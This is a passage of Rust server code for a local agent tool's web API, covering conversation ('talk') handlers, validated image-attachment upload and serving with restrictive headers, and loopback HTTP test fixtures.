3359 Path((id, name)): Path<(String, String)>,
3360) -> ApiResult<Response> {
3361 if !crate::ask::valid_asset_name(&name) {
3364 return Err(ApiError::bad_request(format!(
3365 "`{name}` is not a usable asset name"
3366 )));
3367 }
3368 blocking(move || {
3369 let id = resolve_question(&ui.questions, &id)?;
3370 let asset = ui
3371 .questions
3372 .panel_asset(&id, &name)
3373 .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
3374 let Some(bytes) = asset else {
3375 return Err(ApiError::not_found(format!(
3376 "question {id} has no asset `{name}`"
3377 )));
3378 };
3379 Ok(panel_response(
3380 asset_content_type(&name),
3381 is_svg(&name),
3382 bytes,
3383 ))
3384 })
3385 .await
3386}
3387
3388fn asset_content_type(name: &str) -> &'static str {
3401 match extension(name).as_deref() {
3402 Some("png") => "image/png",
3403 Some("jpg" | "jpeg") => "image/jpeg",
3404 Some("gif") => "image/gif",
3405 Some("webp") => "image/webp",
3406 Some("svg") => "image/svg+xml",
3407 Some("css") => "text/css; charset=utf-8",
3408 Some("txt") => "text/plain; charset=utf-8",
3409 _ => "application/octet-stream",
3410 }
3411}
3412
3413fn is_svg(name: &str) -> bool {
3416 extension(name).as_deref() == Some("svg")
3417}
3418
3419fn extension(name: &str) -> Option<String> {
3421 name.rsplit_once('.')
3422 .map(|(_, ext)| ext.to_ascii_lowercase())
3423}
3424
3425fn panel_response(content_type: &'static str, download: bool, body: Vec<u8>) -> Response {
3442 let mut res = (
3443 [
3444 (header::CONTENT_TYPE, content_type),
3445 (header::CONTENT_SECURITY_POLICY, PANEL_CSP),
3446 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
3447 (header::REFERRER_POLICY, "no-referrer"),
3448 ],
3449 body,
3450 )
3451 .into_response();
3452 if download {
3453 res.headers_mut().insert(
3454 header::CONTENT_DISPOSITION,
3455 HeaderValue::from_static("attachment"),
3456 );
3457 }
3458 res
3459}
3460
3461#[derive(Debug, Serialize)]
3467struct TalkView {
3468 #[serde(flatten)]
3469 talk: Talk,
3470 turn_bodies_md: Vec<Vec<md::Node>>,
3471 thinking: bool,
3479}
3480
3481impl TalkView {
3482 fn new(talk: Talk, thinking: bool) -> Self {
3483 let turn_bodies_md = talk
3484 .turns
3485 .iter()
3486 .map(|turn| md::to_nodes(&turn.body, &md::ImageBase::None))
3487 .collect();
3488 Self {
3489 turn_bodies_md,
3490 thinking,
3491 talk,
3492 }
3493 }
3494}
3495
3496#[derive(Debug, Serialize)]
3501struct TalkDetailView {
3502 #[serde(flatten)]
3503 view: TalkView,
3504 tasks: Vec<TaskView>,
3505}
3506
3507async fn talks_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TalkView>>> {
3512 blocking(move || {
3513 Ok(Json(
3514 ui.talks
3515 .list()
3516 .into_iter()
3517 .map(|talk| {
3518 let thinking = ui.is_thinking(&talk.id);
3519 TalkView::new(talk, thinking)
3520 })
3521 .collect(),
3522 ))
3523 })
3524 .await
3525}
3526
3527#[derive(Debug, Default, Deserialize)]
3532#[serde(default)]
3533struct NewTalk {
3534 agent: Option<String>,
3535 repo: Option<PathBuf>,
3536}
3537
3538async fn talk_post(
3541 State(ui): State<Arc<Ui>>,
3542 body: std::result::Result<Json<NewTalk>, JsonRejection>,
3543) -> ApiResult<impl IntoResponse> {
3544 let body = match body {
3548 Ok(Json(body)) => body,
3549 Err(JsonRejection::MissingJsonContentType(_)) => NewTalk::default(),
3550 Err(e) => return Err(ApiError::bad_request(e.body_text())),
3551 };
3552 let repo = body.repo.clone().unwrap_or_else(|| ui.repo.clone());
3553 let cfg = config_for(&repo).await?;
3554 let view = blocking(move || {
3555 let talk = talk::begin(&ui.talks, &cfg, repo, body.agent.as_deref())?;
3556 let thinking = ui.is_thinking(&talk.id);
3557 Ok(TalkView::new(talk, thinking))
3558 })
3559 .await?;
3560 Ok((StatusCode::CREATED, Json(view)))
3561}
3562
3563async fn talk_detail(
3565 State(ui): State<Arc<Ui>>,
3566 Path(id): Path<String>,
3567) -> ApiResult<Json<TalkDetailView>> {
3568 blocking(move || {
3569 let id = resolve_talk(&ui.talks, &id)?;
3570 let talk = ui.talks.get(&id)?;
3571 let thinking = ui.is_thinking(&talk.id);
3572 let tasks = talk::tasks_of(&ui.queue, &talk.id)
3573 .into_iter()
3574 .map(TaskView::from)
3575 .collect();
3576 Ok(Json(TalkDetailView {
3577 view: TalkView::new(talk, thinking),
3578 tasks,
3579 }))
3580 })
3581 .await
3582}
3583
3584#[derive(Debug, Default, Deserialize)]
3590#[serde(default, deny_unknown_fields)]
3591struct NewTalkTurn {
3592 text: String,
3593 attachments: Vec<String>,
3594}
3595
3596#[derive(Debug, Deserialize)]
3597#[serde(deny_unknown_fields)]
3598struct EditTalkPending {
3599 text: String,
3600 expected_text: String,
3601 expected_attachments: Vec<String>,
3602}
3603
3604#[derive(Debug, Deserialize)]
3605#[serde(deny_unknown_fields)]
3606struct ClearTalkPending {
3607 expected_text: String,
3608 expected_attachments: Vec<String>,
3609}
3610
3611async fn talk_say(
3623 State(ui): State<Arc<Ui>>,
3624 Path(id): Path<String>,
3625 body: std::result::Result<Json<NewTalkTurn>, JsonRejection>,
3626) -> ApiResult<(StatusCode, Json<TalkView>)> {
3627 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3628 if body.text.trim().is_empty() && body.attachments.is_empty() {
3629 return Err(ApiError::bad_request("say something"));
3630 }
3631
3632 let id = {
3633 let ui = Arc::clone(&ui);
3634 let asked = id.clone();
3635 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3636 };
3637 {
3641 let ui = Arc::clone(&ui);
3642 let id = id.clone();
3643 blocking(move || {
3644 let talk = ui.talks.get(&id)?;
3645 if !talk.status.open() {
3646 return Err(ApiError::conflict(format!(
3647 "talk {} is {} and takes no more turns",
3648 talk.short(),
3649 talk.status.as_str()
3650 )));
3651 }
3652 Ok(())
3653 })
3654 .await?;
3655 }
3656
3657 let attachments = {
3662 let ui = Arc::clone(&ui);
3663 let id = id.clone();
3664 let ids = body.attachments.clone();
3665 blocking(move || {
3666 ids.into_iter()
3667 .map(|att_id| {
3668 ui.talks.attachment_meta(&id, &att_id)?.ok_or_else(|| {
3669 ApiError::bad_request(format!("unknown attachment `{att_id}`"))
3670 })
3671 })
3672 .collect::<ApiResult<Vec<talk::Attachment>>>()
3673 })
3674 .await?
3675 };
3676
3677 let start = {
3682 let ui = Arc::clone(&ui);
3683 let id = id.clone();
3684 blocking(move || ui.begin_talk_turn_unless_pending(&id)).await?
3685 };
3686 let turn_guard = match start {
3687 TalkTurnStart::Claimed(turn_guard) => turn_guard,
3688 TalkTurnStart::Pending => {
3689 return Err(ApiError::conflict(
3690 "a queued draft is waiting; resume it, edit it, or clear it before sending another message",
3691 ));
3692 }
3693 TalkTurnStart::Busy => {
3694 let (tx, rx) = tokio::sync::oneshot::channel();
3710 tokio::spawn({
3711 let ui = Arc::clone(&ui);
3712 let id = id.clone();
3713 let said = body.text.clone();
3714 async move {
3715 let written = blocking({
3716 let ui = Arc::clone(&ui);
3717 let id = id.clone();
3718 move || {
3719 let mut talk = ui.talks.get(&id)?;
3720 #[cfg(test)]
3725 if let Some(gate) = ui
3726 .busy_queue_gate
3727 .lock()
3728 .unwrap_or_else(PoisonError::into_inner)
3729 .take()
3730 {
3731 let _ = gate.reached.send(());
3732 let _ = gate.release.recv();
3733 }
3734 if let Err(error) =
3735 talk::queue(&mut talk, &ui.talks, &said, attachments)
3736 {
3737 if let Ok(fresh) = ui.talks.get(&id) {
3738 if !fresh.status.open() {
3739 return Err(ApiError::conflict(format!(
3740 "talk {} is {} and takes no more turns",
3741 fresh.short(),
3742 fresh.status.as_str()
3743 )));
3744 }
3745 }
3746 return Err(ApiError::from(error));
3747 }
3748 let claim = match ui.begin_queued_talk_turn(&id)? {
3759 Some(turn_guard) => {
3760 let (cfg, _) = Config::discover(&talk.repo, None)?;
3761 Some((talk.clone(), cfg, turn_guard))
3762 }
3763 None => None,
3764 };
3765 let thinking = ui.is_thinking(&id);
3766 Ok((TalkView::new(talk, thinking), claim))
3767 }
3768 })
3769 .await;
3770 let (view, reclaimed) = match written {
3771 Ok(pair) => pair,
3772 Err(e) => {
3773 let _ = tx.send(Err(e));
3778 return;
3779 }
3780 };
3781 let _ = tx.send(Ok(view));
3784 if let Some((talk, cfg, turn_guard)) = reclaimed {
3785 let talks = ui.talks.clone();
3786 drain_loop(talk, talks, cfg, id, turn_guard).await;
3787 }
3788 }
3789 });
3790 let view = rx
3791 .await
3792 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
3793 return Ok((StatusCode::ACCEPTED, Json(view)));
3794 }
3795 };
3796
3797 let (talk, cfg) = {
3798 let ui = Arc::clone(&ui);
3799 let id = id.clone();
3800 blocking(move || {
3801 let talk = ui.talks.get(&id)?;
3802 let (cfg, _) = Config::discover(&talk.repo, None)?;
3803 Ok((talk, cfg))
3804 })
3805 .await?
3806 };
3807
3808 let talks = ui.talks.clone();
3809 let (tx, rx) = tokio::sync::oneshot::channel();
3824 tokio::spawn({
3825 let ui = Arc::clone(&ui);
3826 let talks = talks.clone();
3827 let id = id.clone();
3828 let said = body.text.clone();
3829 let mut talk = talk.clone();
3830 async move {
3831 let recorded = blocking({
3832 let talks = talks.clone();
3833 move || {
3834 if let Err(error) = talk::record(&mut talk, &talks, &said, attachments) {
3835 if let Ok(fresh) = talks.get(&talk.id) {
3836 if !fresh.status.open() {
3837 return Err(ApiError::conflict(format!(
3838 "talk {} is {} and takes no more turns",
3839 fresh.short(),
3840 fresh.status.as_str()
3841 )));
3842 }
3843 }
3844 return Err(ApiError::from(error));
3845 }
3846 Ok((said.trim().to_owned(), talk))
3852 }
3853 })
3854 .await;
3855 let (text, mut talk) = match recorded {
3856 Ok(pair) => pair,
3857 Err(e) => {
3858 let _ = tx.send(Err(e));
3862 return;
3863 }
3864 };
3865 let queued = talk.clone();
3866 let thinking = ui.is_thinking(&id);
3867 let _ = tx.send(Ok((queued, thinking)));
3870
3871 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &text).await {
3872 tracing::warn!("talk {id} turn failed: {e:#}");
3876 }
3877 drain_loop(talk, talks, cfg, id, turn_guard).await;
3880 }
3881 });
3882
3883 let (queued, thinking) = rx
3884 .await
3885 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
3886
3887 Ok((StatusCode::ACCEPTED, Json(TalkView::new(queued, thinking))))
3889}
3890
3891async fn talk_pending_resume(
3895 State(ui): State<Arc<Ui>>,
3896 Path(id): Path<String>,
3897) -> ApiResult<(StatusCode, Json<TalkView>)> {
3898 let id = {
3899 let ui = Arc::clone(&ui);
3900 let asked = id.clone();
3901 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3902 };
3903 let Some(turn_guard) = ui.begin_talk_turn(&id)? else {
3904 return Err(ApiError::conflict(
3905 "a talk turn is already running; the queued draft will be handled by it",
3906 ));
3907 };
3908 let (talk, cfg) = {
3909 let ui = Arc::clone(&ui);
3910 let id = id.clone();
3911 blocking(move || {
3912 let talk = ui.talks.get(&id)?;
3913 if !talk.status.open() {
3914 return Err(ApiError::conflict(format!(
3915 "talk {} is {} and takes no more turns",
3916 talk.short(),
3917 talk.status.as_str()
3918 )));
3919 }
3920 if talk.pending.is_empty() && talk.pending_attachments.is_empty() {
3921 return Err(ApiError::conflict("there is no queued draft to resume"));
3922 }
3923 let (cfg, _) = Config::discover(&talk.repo, None)?;
3924 Ok((talk, cfg))
3925 })
3926 .await?
3927 };
3928 let view = TalkView::new(talk.clone(), true);
3929 let talks = ui.talks.clone();
3930 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
3931 Ok((StatusCode::ACCEPTED, Json(view)))
3932}
3933
3934async fn drain_loop(mut talk: Talk, talks: Talks, cfg: Config, id: String, turn: TalkTurnGuard) {
3950 let live_set = Arc::clone(&turn.turns);
3951 let mut turn = Some(turn);
3959 loop {
3960 let observed = live_set
3964 .lock()
3965 .unwrap_or_else(PoisonError::into_inner)
3966 .queued
3967 .get(&id)
3968 .copied()
3969 .unwrap_or(0);
3970 let drained = blocking({
3971 let talks = talks.clone();
3972 move || {
3973 let result = talk::drain(&mut talk, &talks);
3974 Ok((talk, result))
3975 }
3976 })
3977 .await;
3978 let (next_talk, result) = match drained {
3979 Ok(drained) => drained,
3980 Err(e) => {
3981 tracing::warn!(
3982 status = %e.status,
3983 message = %e.message,
3984 "talk {id} could not start queued-text drain"
3985 );
3986 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
3987 turn.take()
3988 .expect("held for the whole loop until released here")
3989 .release(&mut live);
3990 break;
3991 }
3992 };
3993 talk = next_talk;
3994 let drained = match result {
3995 Ok(Some(drained)) => drained,
3996 Ok(None) => {
3997 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
3998 if live.queued.get(&id).copied().unwrap_or(0) != observed {
3999 continue;
4000 }
4001 turn.take()
4002 .expect("held for the whole loop until released here")
4003 .release(&mut live);
4004 break;
4005 }
4006 Err(e) => {
4007 tracing::warn!("talk {id} could not drain queued text: {e:#}");
4008 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4009 turn.take()
4010 .expect("held for the whole loop until released here")
4011 .release(&mut live);
4012 break;
4013 }
4014 };
4015 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &drained).await {
4016 tracing::warn!("talk {id} turn failed: {e:#}");
4017 }
4018 }
4019}
4020
4021async fn talk_pending_clear(
4023 State(ui): State<Arc<Ui>>,
4024 Path(id): Path<String>,
4025 body: std::result::Result<Json<ClearTalkPending>, JsonRejection>,
4026) -> ApiResult<Json<TalkView>> {
4027 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4028 blocking(move || {
4029 let id = resolve_talk(&ui.talks, &id)?;
4030 let mut talk = ui.talks.get(&id)?;
4031 if !talk.status.open() {
4032 return Err(ApiError::conflict(format!(
4033 "talk {} is {} and takes no more turns",
4034 talk.short(),
4035 talk.status.as_str()
4036 )));
4037 }
4038 if !talk::clear_pending_if_matches(
4039 &mut talk,
4040 &ui.talks,
4041 &body.expected_text,
4042 &body.expected_attachments,
4043 )? {
4044 return Err(ApiError::conflict(
4045 "queued message changed; reload it before clearing",
4046 ));
4047 }
4048 let thinking = ui.is_thinking(&talk.id);
4049 Ok(Json(TalkView::new(talk, thinking)))
4050 })
4051 .await
4052}
4053
4054async fn talk_pending_edit(
4058 State(ui): State<Arc<Ui>>,
4059 Path(id): Path<String>,
4060 body: std::result::Result<Json<EditTalkPending>, JsonRejection>,
4061) -> ApiResult<Json<TalkView>> {
4062 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4063 let (view, reclaimed) = blocking({
4064 let ui = Arc::clone(&ui);
4065 move || {
4066 let id = resolve_talk(&ui.talks, &id)?;
4067 let mut talk = ui.talks.get(&id)?;
4068 if !talk.status.open() {
4069 return Err(ApiError::conflict(format!(
4070 "talk {} is {} and takes no more turns",
4071 talk.short(),
4072 talk.status.as_str()
4073 )));
4074 }
4075 if !talk::edit_pending_text(
4076 &mut talk,
4077 &ui.talks,
4078 &body.text,
4079 &body.expected_text,
4080 &body.expected_attachments,
4081 )? {
4082 return Err(ApiError::conflict(
4083 "queued message changed; reload it before editing",
4084 ));
4085 }
4086 let claim = match ui.begin_queued_talk_turn(&id)? {
4087 Some(turn_guard) => {
4088 let (cfg, _) = Config::discover(&talk.repo, None)?;
4089 Some((talk.clone(), cfg, id.clone(), turn_guard))
4090 }
4091 None => None,
4092 };
4093 let thinking = ui.is_thinking(&id);
4094 Ok((TalkView::new(talk, thinking), claim))
4095 }
4096 })
4097 .await?;
4098 if let Some((talk, cfg, id, turn_guard)) = reclaimed {
4099 let talks = ui.talks.clone();
4100 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4101 }
4102 Ok(Json(view))
4103}
4104
4105async fn talk_close(
4107 State(ui): State<Arc<Ui>>,
4108 Path(id): Path<String>,
4109) -> ApiResult<Json<TalkView>> {
4110 blocking(move || {
4111 let id = resolve_talk(&ui.talks, &id)?;
4112 let mut talk = ui.talks.get(&id)?;
4113 talk::close(&mut talk, &ui.talks)?;
4114 let thinking = ui.is_thinking(&talk.id);
4115 Ok(Json(TalkView::new(talk, thinking)))
4116 })
4117 .await
4118}
4119
4120async fn talk_reopen(
4122 State(ui): State<Arc<Ui>>,
4123 Path(id): Path<String>,
4124) -> ApiResult<Json<TalkView>> {
4125 blocking(move || {
4126 let id = resolve_talk(&ui.talks, &id)?;
4127 let mut talk = ui.talks.get(&id)?;
4128 talk::reopen(&mut talk, &ui.talks)?;
4129 let thinking = ui.is_thinking(&talk.id);
4130 Ok(Json(TalkView::new(talk, thinking)))
4131 })
4132 .await
4133}
4134
4135async fn talk_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
4145 blocking(move || {
4146 let id = resolve_talk(&ui.talks, &id)?;
4147 ui.talks.remove(&id)?;
4148 Ok(StatusCode::NO_CONTENT)
4149 })
4150 .await
4151}
4152
4153fn resolve_talk(store: &Talks, id: &str) -> ApiResult<String> {
4155 pick(store.list().into_iter().map(|t| t.id).collect(), id, "talk")
4156}
4157
4158async fn talk_attachment_post(
4161 State(ui): State<Arc<Ui>>,
4162 Path(id): Path<String>,
4163 headers: HeaderMap,
4164 body: Bytes,
4165) -> ApiResult<(StatusCode, Json<talk::Attachment>)> {
4166 let mime = validate_attachment(&headers, &body)?;
4167 let name = filename_header(&headers);
4168 let data = body.to_vec();
4169 blocking(move || {
4170 let id = resolve_talk(&ui.talks, &id)?;
4171 let att = ui.talks.put_attachment(&id, mime, &name, &data)?;
4172 Ok((StatusCode::CREATED, Json(att)))
4173 })
4174 .await
4175}
4176
4177async fn talk_attachment_get(
4180 State(ui): State<Arc<Ui>>,
4181 Path((id, att)): Path<(String, String)>,
4182) -> ApiResult<Response> {
4183 blocking(move || {
4184 let id = resolve_talk(&ui.talks, &id)?;
4185 let Some((meta, data)) = ui.talks.read_attachment(&id, &att)? else {
4186 return Err(ApiError::not_found(format!(
4187 "talk {id} has no attachment `{att}`"
4188 )));
4189 };
4190 Ok(attachment_response(&meta.mime, data))
4191 })
4192 .await
4193}
4194
4195fn validate_attachment(headers: &HeaderMap, data: &[u8]) -> ApiResult<&'static str> {
4206 if data.len() > ATTACHMENT_MAX_BYTES {
4207 return Err(ApiError::bad_request(format!(
4208 "attachment is {} bytes, over the {} MiB limit",
4209 data.len(),
4210 ATTACHMENT_MAX_BYTES / (1024 * 1024)
4211 ))
4212 .with_status(StatusCode::PAYLOAD_TOO_LARGE));
4213 }
4214 if data.is_empty() {
4215 return Err(ApiError::bad_request("attachment is empty"));
4216 }
4217 let declared = declared_mime(headers)?;
4218 match sniffed_mime(data) {
4219 Some(sniffed) if sniffed == declared => Ok(declared),
4220 Some(sniffed) => Err(ApiError::bad_request(format!(
4221 "Content-Type said `{declared}` but the file's own bytes look like `{sniffed}`"
4222 ))),
4223 None => Err(ApiError::bad_request(
4224 "the file's bytes do not match any accepted image format",
4225 )),
4226 }
4227}
4228
4229fn declared_mime(headers: &HeaderMap) -> ApiResult<&'static str> {
4233 let raw = headers
4234 .get(header::CONTENT_TYPE)
4235 .and_then(|v| v.to_str().ok())
4236 .unwrap_or("")
4237 .split(';')
4238 .next()
4239 .unwrap_or("")
4240 .trim()
4241 .to_ascii_lowercase();
4242 ATTACHMENT_MIME_WHITELIST
4243 .iter()
4244 .find(|&&m| m == raw)
4245 .copied()
4246 .ok_or_else(|| {
4247 if raw == "image/svg+xml" {
4248 ApiError::bad_request(
4249 "SVG is not accepted: it can carry active content (e.g. a <script>), \
4250 not just a picture",
4251 )
4252 } else if raw.is_empty() {
4253 ApiError::bad_request("Content-Type is required for an attachment upload")
4254 } else {
4255 ApiError::bad_request(format!(
4256 "`{raw}` is not an accepted attachment type; use image/png, image/jpeg, \
4257 image/gif or image/webp"
4258 ))
4259 }
4260 })
4261}
4262
4263fn sniffed_mime(data: &[u8]) -> Option<&'static str> {
4266 if data.starts_with(b"\x89PNG\r\n\x1a\n") {
4267 Some("image/png")
4268 } else if data.starts_with(b"\xff\xd8\xff") {
4269 Some("image/jpeg")
4270 } else if data.starts_with(b"GIF87a") || data.starts_with(b"GIF89a") {
4271 Some("image/gif")
4272 } else if data.len() >= 12 && &data[0..4] == b"RIFF" && &data[8..12] == b"WEBP" {
4273 Some("image/webp")
4274 } else {
4275 None
4276 }
4277}
4278
4279fn filename_header(headers: &HeaderMap) -> String {
4285 headers
4286 .get(FILENAME_HEADER)
4287 .and_then(|v| v.to_str().ok())
4288 .map(str::trim)
4289 .filter(|s| !s.is_empty())
4290 .unwrap_or("attachment")
4291 .to_owned()
4292}
4293
4294fn attachment_response(mime: &str, body: Vec<u8>) -> Response {
4301 let content_type = ATTACHMENT_MIME_WHITELIST
4302 .iter()
4303 .find(|&&m| m == mime)
4304 .copied()
4305 .unwrap_or("application/octet-stream");
4306 (
4307 [
4308 (header::CONTENT_TYPE, content_type),
4309 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
4310 ],
4311 body,
4312 )
4313 .into_response()
4314}
4315
4316async fn config_for(repo: &FsPath) -> ApiResult<Config> {
4324 let repo = repo.to_path_buf();
4325 blocking(move || {
4326 let (cfg, _) = Config::discover(&repo, None)?;
4327 Ok(cfg)
4328 })
4329 .await
4330}
4331
4332fn pick(ids: Vec<String>, prefix: &str, what: &str) -> ApiResult<String> {
4338 let mut hits = ids
4339 .into_iter()
4340 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix));
4341 match (hits.next(), hits.next()) {
4342 (Some(one), None) => Ok(one),
4343 (None, _) => Err(ApiError::not_found(format!("no {what} matches `{prefix}`"))),
4344 (Some(a), Some(b)) => Err(ApiError::bad_request(format!(
4345 "`{prefix}` matches more than one {what}, including {a} and {b}"
4346 ))),
4347 }
4348}
4349
4350#[cfg(test)]
4351mod tests {
4352 use pretty_assertions::assert_eq;
4353 use serde_json::Value;
4354 use tempfile::TempDir;
4355 use tokio::io::{AsyncReadExt as _, AsyncWriteExt as _};
4356
4357 use super::*;
4358 use crate::config::Config;
4359 use crate::queue::{Source, TaskStatus};
4360
4361 const SETTLE_STEPS: usize = 3_000;
4372
4373 struct Fixture {
4379 home: TempDir,
4380 addr: SocketAddr,
4381 }
4382
4383 impl Fixture {
4384 async fn start() -> Self {
4385 Self::with_loop(launch_idle).await
4386 }
4387
4388 async fn with_loop(launch: Launch) -> Self {
4390 let home = TempDir::new().expect("temp home");
4391 let addr = Self::serve(home.path(), PathBuf::from("/repo/magi"), launch).await;
4392 Self { home, addr }
4393 }
4394
4395 async fn with_repo(repo: PathBuf) -> Self {
4399 let home = TempDir::new().expect("temp home");
4400 let addr = Self::serve(home.path(), repo, launch_idle).await;
4401 Self { home, addr }
4402 }
4403
4404 async fn serve(home: &FsPath, repo: PathBuf, launch: Launch) -> SocketAddr {
4405 let queue = Queue::at(home.join("queue"));
4406 let runs = home.join("runs");
4407 std::fs::create_dir_all(&runs).expect("runs dir");
4408 let worktrees = home.join("wt").join("magi");
4409 std::fs::create_dir_all(&worktrees).expect("worktrees dir");
4410 let ui = Ui::new(
4411 queue,
4412 Questions::at(home.join("questions")),
4413 Talks::at(home.join("talks")),
4414 runs,
4415 home.to_path_buf(),
4416 repo,
4417 )
4418 .with_worktrees_root(worktrees)
4419 .with_launch(launch);
4420 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
4421 .await
4422 .expect("bind loopback");
4423 let addr = listener.local_addr().expect("local addr");
4424 tokio::spawn(async move {
4425 let _ = axum::serve(listener, ui.router()).await;
4426 });
4427 addr
4428 }
4429
4430 fn queue(&self) -> Queue {
4431 Queue::at(self.home.path().join("queue"))
4432 }
4433
4434 fn questions(&self) -> Questions {
4435 Questions::at(self.home.path().join("questions"))
4436 }
4437
4438 fn talks(&self) -> Talks {
4439 Talks::at(self.home.path().join("talks"))
4440 }
4441
4442 fn runs(&self) -> PathBuf {
4443 self.home.path().join("runs")
4444 }
4445
4446 async fn get(&self, path: &str) -> Res {
4447 request(self.addr, "GET", path, None).await
4448 }
4449
4450 async fn head(&self, path: &str) -> Res {
4455 request(self.addr, "HEAD", path, None).await
4456 }
4457
4458 async fn post(&self, path: &str, body: Option<&str>) -> Res {
4459 request(self.addr, "POST", path, body).await
4460 }
4461
4462 async fn get_with(&self, path: &str, extra: &[(&str, &str)]) -> Res {
4463 request_with(self.addr, "GET", path, None, extra).await
4464 }
4465
4466 async fn delete(&self, path: &str) -> Res {
4467 request(self.addr, "DELETE", path, None).await
4468 }
4469
4470 async fn post_bytes(&self, path: &str, headers: &[(&str, &str)], body: &[u8]) -> Res {
4472 request_bytes(self.addr, path, headers, body).await
4473 }
4474 }
4475
4476 struct Res {
4477 status: u16,
4478 headers: String,
4479 head: String,
4484 body: String,
4485 bytes: Vec<u8>,
4489 }
4490
4491 impl Res {
4492 fn json(&self) -> Value {
4493 serde_json::from_str(&self.body)
4494 .unwrap_or_else(|e| panic!("body is not json ({e}): {}", self.body))
4495 }
4496
4497 fn header(&self, name: &str) -> Option<&str> {
4499 self.head.lines().find_map(|line| {
4500 let (key, value) = line.split_once(':')?;
4501 key.trim()
4502 .eq_ignore_ascii_case(name)
4503 .then(|| value.trim_start().trim_end_matches('\r'))
4504 })
4505 }
4506 }
4507
4508 async fn request(addr: SocketAddr, method: &str, path: &str, body: Option<&str>) -> Res {
4511 request_with(addr, method, path, body, &[]).await
4512 }
4513
4514 async fn request_with(
4518 addr: SocketAddr,
4519 method: &str,
4520 path: &str,
4521 body: Option<&str>,
4522 extra: &[(&str, &str)],
4523 ) -> Res {
4524 let mut head = format!("{method} {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4525 for (name, value) in extra {
4526 head.push_str(&format!("{name}: {value}\r\n"));
4527 }
4528 if let Some(body) = body {
4529 head.push_str("Content-Type: application/json\r\n");
4530 head.push_str(&format!("Content-Length: {}\r\n", body.len()));
4531 }
4532 head.push_str("\r\n");
4533 if let Some(body) = body {
4534 head.push_str(body);
4535 }
4536 let mut socket = tokio::net::TcpStream::connect(addr)
4537 .await
4538 .expect("connect to the test server");
4539 socket
4540 .write_all(head.as_bytes())
4541 .await
4542 .expect("write request");
4543 let mut raw = Vec::new();
4544 socket.read_to_end(&mut raw).await.expect("read response");
4545 let split = raw
4548 .windows(4)
4549 .position(|w| w == b"\r\n\r\n")
4550 .expect("a header block");
4551 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4552 let bytes = raw[split + 4..].to_vec();
4553 let status = head
4554 .lines()
4555 .next()
4556 .and_then(|line| line.split_whitespace().nth(1))
4557 .and_then(|code| code.parse().ok())
4558 .expect("a status line");
4559 Res {
4560 status,
4561 headers: head.to_lowercase(),
4562 head,
4563 body: String::from_utf8_lossy(&bytes).into_owned(),
4564 bytes,
4565 }
4566 }
4567
4568 async fn request_bytes(
4574 addr: SocketAddr,
4575 path: &str,
4576 headers: &[(&str, &str)],
4577 body: &[u8],
4578 ) -> Res {
4579 let mut head = format!("POST {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4580 for (name, value) in headers {
4581 head.push_str(&format!("{name}: {value}\r\n"));
4582 }
4583 head.push_str(&format!("Content-Length: {}\r\n\r\n", body.len()));
4584 let mut socket = tokio::net::TcpStream::connect(addr)
4585 .await
4586 .expect("connect to the test server");
4587 socket
4588 .write_all(head.as_bytes())
4589 .await
4590 .expect("write request head");
4591 socket.write_all(body).await.expect("write request body");
4592 let mut raw = Vec::new();
4593 socket.read_to_end(&mut raw).await.expect("read response");
4594 let split = raw
4595 .windows(4)
4596 .position(|w| w == b"\r\n\r\n")
4597 .expect("a header block");
4598 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4599 let bytes = raw[split + 4..].to_vec();
4600 let status = head
4601 .lines()
4602 .next()
4603 .and_then(|line| line.split_whitespace().nth(1))
4604 .and_then(|code| code.parse().ok())
4605 .expect("a status line");
4606 Res {
4607 status,
4608 headers: head.to_lowercase(),
4609 head,
4610 body: String::from_utf8_lossy(&bytes).into_owned(),
4611 bytes,
4612 }
4613 }
4614
4615 fn write_run(runs: &FsPath, id: &str, status: RunStatus) {
4617 let mut state = RunState::new(
4618 PathBuf::from("/repo/magi"),
4619 "main".to_owned(),
4620 "0123456789abcdef".to_owned(),
4621 "Add a web UI\n\nMobile first.".to_owned(),
4622 Config::default(),
4623 );
4624 state.id = id.to_owned();
4625 state.status = status;
4626 let dir = runs.join(id);
4627 std::fs::create_dir_all(&dir).expect("run dir");
4628 std::fs::write(
4629 dir.join("run.json"),
4630 serde_json::to_string_pretty(&state).expect("serialize run"),
4631 )
4632 .expect("write run.json");
4633 }
4634
4635 fn write_daemon(home: &FsPath, updated_at: Timestamp) {
4636 let body = serde_json::json!({
4637 "schema": 1,
4638 "pid": 4242,
4639 "started_at": Timestamp::now().to_string(),
4640 "updated_at": updated_at.to_string(),
4641 "idle": false,
4642 "current": [{ "task": "20260902-140501-aaaa", "run": "20260902-140502-bbbb" }],
4643 "completed": 7,
4644 "polls": 143,
4645 });
4646 std::fs::write(home.join("daemon.json"), body.to_string()).expect("write daemon.json");
4647 }
4648
4649 fn launch_idle(
4659 _opts: daemon::Opts,
4660 stop: daemon::Stop,
4661 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4662 Box::pin(async move {
4663 while !stop.stopped() {
4664 tokio::time::sleep(Duration::from_millis(2)).await;
4665 }
4666 Ok(())
4667 })
4668 }
4669
4670 fn launch_broken(
4673 _opts: daemon::Opts,
4674 _stop: daemon::Stop,
